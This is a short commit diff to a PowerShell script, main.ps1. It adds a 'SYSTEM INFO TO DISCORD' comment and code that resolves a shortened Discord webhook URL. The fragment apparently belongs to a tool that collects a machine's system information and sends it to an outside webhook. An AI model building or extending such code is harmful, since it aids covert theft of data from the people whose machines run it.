Update main.ps1

This commit is contained in:
egieb
2024-02-12 11:42:30 +00:00
committed by GitHub
parent 90d25c64cf
commit a231e8bd2e

View File

@@ -1,4 +1,6 @@
$hookurl = "$dc"
# SYSTEM INFO TO DISCORD
$hookurl = "$dc"
# shortened URL Detection
if ($hookurl.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $hookurl = (irm $hookurl).url}